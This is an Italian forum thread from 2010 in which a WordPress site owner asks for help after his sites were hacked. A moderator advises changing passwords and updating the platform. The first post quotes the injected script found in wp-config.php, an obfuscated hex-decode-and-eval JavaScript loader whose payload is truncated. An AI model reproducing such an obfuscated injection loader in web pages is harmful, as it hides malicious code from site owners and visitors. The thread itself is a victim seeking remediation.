Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

Ecovacs Goat O1200 LiDAR Pro: la prova del robot tagliaerba con tagliabordi integrato
Ecovacs Goat O1200 LiDAR Pro: la prova del robot tagliaerba con tagliabordi integrato
Nuova frontiera per i robot tagliaerba, con Ecovacs GOAT O1200 LiDAR Pro che riconosce l'ambiente in maniera perfetta, grazie a due sensori LiDAR, e dopo la falciatura può anche rifinire il bordo con il tagliabordi a filo integrato
Recensione Samsung Galaxy S26+: sfida l'Ultra, ma ha senso di esistere?
Recensione Samsung Galaxy S26+: sfida l'Ultra, ma ha senso di esistere?
Equilibrio e potenza definiscono il Samsung Galaxy S26+, un flagship che sfida la variante Ultra e la fascia alta del mercato con il primo processore mobile a 2nm. Pur mantenendo l'hardware fotografico precedente, lo smartphone brilla per un display QHD+ da 6,7 pollici d'eccellenza, privo però del trattamento antiriflesso dell'Ultra, e per prestazioni molto elevate. Completano il quadro la ricarica wireless a 20W e, soprattutto, un supporto software settennale
Zeekr X e 7X provate: prezzi, autonomia fino a 615 km e ricarica in 13 minuti
Zeekr X e 7X provate: prezzi, autonomia fino a 615 km e ricarica in 13 minuti
Zeekr sbarca ufficialmente in Italia con tre modelli elettrici premium, X, 7X e 001, distribuiti da Jameel Motors su una rete di 52 punti vendita già attivi. La Zeekr X parte da 39.900 euro, la 7X da 54.100: piattaforma a 800V, chip Snapdragon di ultima generazione, ricarica ultraveloce e un'autonomia dichiarata fino a 615 km WLTP. Le prime consegne sono previste a metà aprile
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 11-10-2010, 16:39   #1
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Sito attaccato da hacker: che fare?

ciao,
ho un sito su piattaforma Wordpress che gestisco e ho scoperto che sono stato vittima di hackers. Non potevo più accedervi a ricevevo un messaggio che diceva:

Parse error: syntax error, unexpected '<' in /home/mhd-01/wwww.xxxxx-yyyyyy.com/htdocs/wp-config.php on line 93.

Via FTP ho controllato il file wp-config.php ed ho trovato questo script:

<script type='text/javascript'>
var t="";var arr="646f63756d656e742e...2729";for(i=0;i<arr.length;i+=2)t+=String.fromCharCode(parseInt(arr[i]+arr[i+1],16));eval(t);
</script>

L'ho cancellato e sono riuscito a visualizzare di nuovo il mio sito ma il pannello di controllo di Wordpress presenta ancora dei problemi, lo visualizzo male, con una grafica sconclusionata per cui credo che il problema non sia risolto.
Ho effettuato la procedura di pulizia indicata qui e, log di hijackthis a parte da analizzare, non mi pare ci sia nulla di particolare nel mio pc. O meglio, prima Antivir mi ha rilevato un Trojan che è stato però eliminato adesso.
Se però il mio pc fosse davvero pulito ora credo che dovrei visualizzare il pannello di controllo di Wordpress correttamente e invece non è così.

Esiste un modo per vedere se nel mio sito è stato inserito qualche altro script da altre parti? Esiste qualche programma per analizzare il mio sito nello specifico invece che il mio pc?

Grazie in anticipo, ciao!

P.S.
Il servizio assistenza del mio hosting mi ha risposto così: "probabilmente ha qualche script nel sito che ha dei BUG che hanno consentito la modifica della pagina. Consigliamo di fare controlli in tal senso." Appunto, come posso fare controlli in tal senso??

Ultima modifica di Fab_DM : 11-10-2010 alle 17:16.
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 11-10-2010, 16:53   #2
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Ciao, sistema il tuo post sballa il layout del forum e riporta l'indirizzo del sito in modo e maniera che non sia cliccabile, grazie.
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 11-10-2010, 17:17   #3
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Ciao, sistema il tuo post sballa il layout del forum e riporta l'indirizzo del sito in modo e maniera che non sia cliccabile, grazie.
ciao, scusa ho editato. Se c'è ancora qualche problema fammi sapere che provvedo!
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 11-10-2010, 17:42   #4
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
ciao, scusa ho editato. Se c'è ancora qualche problema fammi sapere che provvedo!
Tutto ok, ma hai dimenticato di riportare il sito.
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 11-10-2010, 18:56   #5
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Tutto ok, ma hai dimenticato di riportare il sito.
ah no, l'ho eliminato apposta pensando che non si potesse postare!
Anche perchè pensavo bastasse postare lo script fondamentalmente.

Il sito è wwww.health-bodytips.com

L'ho reso non cliccabile, fammi sapere se va bene così!

Grazie!

edit.

ho appena riscontrato lo stesso problema in un altro sito che ho e usavo come prova.
Siccome ho anche altri siti oltre a questi 2, notavo il fatto che, per ora, ho riscontrato questo problema con 2 blog Wordpress che hanno lo stesso hosting service. Un altro blog Wordpress che ho, con un altro hosting, per ora non presenta alcun problema di questo tipo.
Non so se c'entri l'hosting comunque ma volevo riportarlo.
Spero che qualcuno mi sappia dare una mano a capire

Ultima modifica di Fab_DM : 12-10-2010 alle 00:59.
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 12-10-2010, 22:18   #6
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
nessuno ha mai avuto problemi di questo tipo?
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 13-10-2010, 08:44   #7
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
nessuno ha mai avuto problemi di questo tipo?
Ciao, controllato ieri, non ho visto nulla di anomalo.
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 13-10-2010, 14:18   #8
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Ciao, controllato ieri, non ho visto nulla di anomalo.
Ciao, grazie per la risposta!
Purtoppo il pannello di controllo del sito (wordpress) ha una grafica completamente sballata per cui penso ci sia ancora qualcosa che non va.
Ho scoperto che anche un altro blog che ho è stato attaccato ma questo sembra irrecuperabile. Se hai voglia di dargli uno sguardo è wwww.ioinformo.it.
Non riesco più ad accedere

grazie, ciao!
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 13-10-2010, 17:41   #9
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
Ciao, grazie per la risposta!
Purtoppo il pannello di controllo del sito (wordpress) ha una grafica completamente sballata per cui penso ci sia ancora qualcosa che non va.
Ho scoperto che anche un altro blog che ho è stato attaccato ma questo sembra irrecuperabile. Se hai voglia di dargli uno sguardo è wwww.ioinformo.it.
Non riesco più ad accedere

grazie, ciao!
Nulla di anomalo, comunque la prima cosa da fare è cambiare le credenziali ed aggiornare la piattaforma su cui si appoggia il sito.
__________________
Try again and you will be luckier.

Ultima modifica di Chill-Out : 13-10-2010 alle 23:09.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 00:52   #10
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Nulla di anomalo, comunque la prima cosa da fare è cambiare le credenziali ed aggiornare la piattaforma su cui si appoggia il sito.
Ciao, la piattaforma ho provato ad aggiornarla via ftp in quanto dal pannello di controllo non si riesce.
Ho sovrascritto tutti i file tranne la cartella content e il file config.php.
Risultato: tutto come prima.
Ed ogni volta che vi accedo il mio antivirus mi blocca un trojan...
Ma c'è un modo per fare una scansione antivirus al mio sito??
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 14:29   #11
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
Ed ogni volta che vi accedo il mio antivirus mi blocca un trojan...
Mi alleghi il log su uno dei Server remoti indicati nelle Regole di sezione in firma.
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 14:47   #12
zabb
Senior Member
 
L'Avatar di zabb
 
Iscritto dal: Jul 2005
Città: Firenze
Messaggi: 3602
edit
zabb è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 18:44   #13
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Mi alleghi il log su uno dei Server remoti indicati nelle Regole di sezione in firma.
ciao, Antivir non mi dà un vero e proprio log per cui ti allego gli screenshot di ciò che ha rilevato, sperando che siano utili.
Grazie in anticipo!

antivir.jpg

antivir_1.png
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 22:42   #14
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
ciao, Antivir non mi dà un vero e proprio log per cui ti allego gli screenshot di ciò che ha rilevato, sperando che siano utili.
Grazie in anticipo!

antivir.jpg

antivir_1.png
Parliamo di questo health-bodytips ?
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 15-10-2010, 23:26   #15
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Parliamo di questo health-bodytips ?
sì questi sono stati rilevati connettendomi alla homepage health-bodytips prima e al pannello admin di wordpress poi.
Per conoscenza, mi è successo in alcuni casi di ricevere gli stessi avvisi connettendomi anche all'altro sito.
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 20-10-2010, 13:25   #16
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
nessuna novità?
Se cancello tutto via ftp e ricomincio il lavoro da zero, sono sicuro di aver tolto i virus?
Esiste un modo per evitare che qualcuno infili script nelle pagine dei siti internet?
Grazie
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
Old 20-10-2010, 15:17   #17
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Quote:
Originariamente inviato da Fab_DM Guarda i messaggi
nessuna novità?
Se cancello tutto via ftp e ricomincio il lavoro da zero, sono sicuro di aver tolto i virus?
Esiste un modo per evitare che qualcuno infili script nelle pagine dei siti internet?
Grazie
Ricontrollato, non risulta nulla, per evitare tutto eventuali iniezioni di codice i principali accordimenti sono, password robusta e piattaforma sempre aggiornata.
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 21-10-2010, 16:31   #18
Fab_DM
Member
 
Iscritto dal: Dec 2009
Messaggi: 30
Quote:
Originariamente inviato da Chill-Out Guarda i messaggi
Ricontrollato, non risulta nulla, per evitare tutto eventuali iniezioni di codice i principali accordimenti sono, password robusta e piattaforma sempre aggiornata.
ti ringrazio, per un altro sito ho messo una password molto complicata al database MySQL e spero basti.
Un'ultima cosa, c'è un modo in cui possa eventualmente fare io dei controlli in futuro per essere sicuro che nessuno si sia infilato nel mio sito? Giusto per non disturbarvi sempre nel forum, ogni volta che avessi un dubbio riguardo questo problema su uno dei miei siti.
Grazie ancora!
Fab_DM è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


Ecovacs Goat O1200 LiDAR Pro: la prova del robot tagliaerba con tagliabordi integrato Ecovacs Goat O1200 LiDAR Pro: la prova del robot...
Recensione Samsung Galaxy S26+: sfida l'Ultra, ma ha senso di esistere? Recensione Samsung Galaxy S26+: sfida l'Ultra, m...
Zeekr X e 7X provate: prezzi, autonomia fino a 615 km e ricarica in 13 minuti Zeekr X e 7X provate: prezzi, autonomia fino a 6...
Marathon: arriva il Fortnite hardcore Marathon: arriva il Fortnite hardcore
HP Imagine 2026: abbiamo visto HP IQ all’opera, ecco cosa può (e non può) fare HP Imagine 2026: abbiamo visto HP IQ all’opera, ...
Le 10 migliori offerte Amazon di Pasqua:...
Nuove fotografie dagli astronauti di Art...
La toilette della capsula Orion Integrit...
GeForce NOW: ecco tutte le novità in arr...
Il Realme 16 5G debutta sul mercato glob...
HONOR svela tre nuovi tablet: il più int...
Tineco Floor One S9 Master: aspira e pul...
Vivo X300 Ultra, il lancio globale è ini...
Offerte robot aspirapolvere Amazon: ECOV...
L'AI genera codice in 8 minuti e i senio...
Ring Intercom Audio a 44,99€ su Amazon: ...
Apple iPhone 16 crolla a 689€: ecco perc...
Google Pixel 9 a 449,90€ con caricatore ...
Ecco la top 7 delle offerte Amazon, aggi...
Ex ingegnere ammette il sabotaggio: migl...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 20:57.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2026, Jelsoft Enterprises Ltd.
Served by www3v